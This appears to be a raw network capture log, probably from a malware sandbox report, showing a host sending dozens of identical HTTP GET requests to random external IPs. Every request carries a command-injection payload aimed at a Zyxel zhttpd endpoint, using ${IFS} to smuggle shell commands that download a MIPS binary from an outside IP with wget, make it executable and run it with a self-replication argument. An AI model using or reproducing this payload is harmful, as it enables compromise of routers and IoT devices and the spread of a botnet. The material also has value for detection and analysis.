                                                        Feb 2, 2024 06:21:07.889058113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3980192.168.2.144813260.254.125.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889090061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3981192.168.2.1441282183.205.144.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889122009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3982192.168.2.144700439.69.9.129443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889162064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3983192.168.2.1436780192.153.186.192443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889214039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3984192.168.2.1437924217.140.164.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889242887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3985192.168.2.1447152167.10.183.121443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889303923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3986192.168.2.144364269.6.149.74443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889337063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3987192.168.2.1435600125.236.145.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889368057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3988192.168.2.145337858.242.171.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889405966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3989192.168.2.143813635.12.156.176443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889462948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3990192.168.2.1455838146.191.60.249443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889492989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3991192.168.2.144925425.80.9.5443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889533043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3992192.168.2.1449452131.0.179.47443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889564991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3993192.168.2.1446880143.74.69.212443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889599085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3994192.168.2.1436904208.75.29.80443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889662981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3995192.168.2.1454634191.242.98.232443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889678001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3996192.168.2.1448692193.128.116.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889733076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3997192.168.2.145390486.135.185.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889772892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3998192.168.2.145773684.101.172.73443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889854908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3999192.168.2.1433746203.58.53.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889872074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4000192.168.2.1459658149.184.187.50443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889913082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4001192.168.2.1459722163.247.153.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.889955044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4002192.168.2.14450061.129.8.171443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890007973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4003192.168.2.144185218.187.251.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890042067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4004192.168.2.144851240.109.138.117443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890110970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4005192.168.2.1447270121.184.233.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890145063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4006192.168.2.144291684.178.34.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890165091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4007192.168.2.1443430217.64.102.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890213966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4008192.168.2.1435260139.20.14.72443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890247107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4009192.168.2.1451178201.46.69.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890285969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4010192.168.2.145052844.84.232.59443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890316010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4011192.168.2.145857883.249.219.223443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890340090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4012192.168.2.145185034.87.38.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890373945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4013192.168.2.1460182111.242.39.110443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890429974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4014192.168.2.1447518212.254.96.31443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890475035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4015192.168.2.143752481.252.35.229443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890516043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4016192.168.2.144515065.61.26.234443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890528917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4017192.168.2.1452916198.184.200.132443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890589952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4018192.168.2.1455200159.114.210.219443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890642881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4019192.168.2.145404852.44.45.245443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890678883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4020192.168.2.1442290213.134.109.163443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890723944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4021192.168.2.1459142120.201.207.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890752077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4022192.168.2.145688650.221.149.3443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890785933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4023192.168.2.144486497.127.71.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890844107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4024192.168.2.1456054149.121.179.111443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890885115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4025192.168.2.144695079.215.78.145443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890922070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4026192.168.2.144364440.23.173.6443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890949011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4027192.168.2.1443678135.52.17.21443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.890980005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4028192.168.2.1441174189.166.95.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891040087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4029192.168.2.144571654.198.137.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891072989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4030192.168.2.1433620101.220.39.186443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891119957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4031192.168.2.1445766204.111.224.82443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891149044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4032192.168.2.1449904170.6.150.107443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891205072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4033192.168.2.14439648.58.78.215443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891236067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4034192.168.2.1444942107.127.54.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891278028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4035192.168.2.1450562137.180.116.133443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891360998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4036192.168.2.1460004153.108.121.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891391993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4037192.168.2.1447088120.23.173.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891433954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4038192.168.2.1435536115.200.216.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891479969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4039192.168.2.1453888199.167.0.125443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891539097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4040192.168.2.145589838.59.245.162443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891556025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4041192.168.2.144874849.251.247.178443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:07.891586065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4042192.168.2.1437752117.68.226.80443
                                                        TimestampBytes transferredDirectionData
